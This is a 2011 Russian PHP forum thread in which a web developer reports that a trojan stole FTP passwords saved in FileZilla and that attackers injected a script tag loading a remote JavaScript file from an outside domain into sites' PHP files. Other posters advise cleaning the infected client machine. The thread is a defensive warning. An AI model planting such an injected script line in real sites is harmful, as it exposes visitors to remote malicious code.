Главная страницаСоздание сайтовБлог Кузнецова М.В.Статьи о PHPPHP-скриптыСтатьи об ApacheФорум С++КонсультацииФорум "Про Жизнь"
Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В. PHP на примерах (2 издание). Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В. Социальная инженерия и социальные хакеры. Авторы: Кузнецов М.В., Симдянов И.В. Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ 		Консультационный центр SoftTime

Разное
Вход  Регистрация  Список форумов  Живой форум  Архив  RSS-канал  Правила форума  Участники "Online"  Все участники

Выбрать другой форум

 

Здравствуйте, Посетитель!

 Новая тема

 Поиск

  Список тем

вид форума:
Линейный форум Структурный форум

тема: стырили пароли FTP

следующая тема
 
 автор: parczynski   (09.08.2011 в 21:11)   письмо автору
648 байт
  
 

Пару дней назад начал получать сообщения от заказчиков, что на сайтах вылазит какая-то фигня

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/nd/site.ru/http/index.php:1) in /home/nd/site.ru/http/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/nd/site.ru/http/index.php:1) in /home/nd/site.ru/http/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/nd/site.ru/http/index.php:1) in /home/nd/site.ru/http/libraries/joomla/session/session.php on line 426

оказалось что у меня стырили пароли из filezilla. посмотрел в интернете - я не один такой, все это происходит где-то с 7-го августа. в начало некоторых php файлов (index, default и т.д.) вставляется код

<script src="http://yourerating.com/cookiesave.js"></script>


смысл кода пока не понятен. просто открывается robots.txt с bing.com. видимо что-то еще будет.

Так вот к чему я это все. если кто не уверен в защите своего компьютера - срочно меняйте пароли от фтп, и лучше не храните их в таких программах как FileZilla, Ttl Com и пр. Если кто-то уже залетел - в сообщении вложен скрипт который всю эту гадость чистит на сервере

  Ответить  
 
 автор: cheops   (09.08.2011 в 21:29)   письмо автору
  
   для: parczynski   (09.08.2011 в 21:11)
 

Проблема в том, что это, как правило, троян, который торчит у вас на клиентской машине. Сервер, конечно чистить надо, но в первую голову нужно чистить клиентскую машину, откуда был доступ на сервер.

  Ответить  
 
 автор: parczynski   (10.08.2011 в 02:56)   письмо автору
  
   для: cheops   (09.08.2011 в 21:29)
 

Трояны были да, причем доволно серьезные. На ряду с тем что читало файлы ftp-клиентов еще и кейлоггеры работали. но было это все 2 месяца назад, после этого и ОС переустанавливал и антивирусы ставил, а о поролях некоторых фтп не задумался. лохонулся. потом вроде тишина и вот только сейчас начали внедрять код.

  Ответить  
 
 автор: antf   (10.08.2011 в 03:44)   письмо автору
  
   для: parczynski   (09.08.2011 в 21:11)
 

>оказалось что у меня стырили пароли из filezilla

Когда-то тоже здорово мучился с этой проблемой. Нашел решение. С тех пор проблема кражи паролей из фтп-клиента отпала.

  Ответить  
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования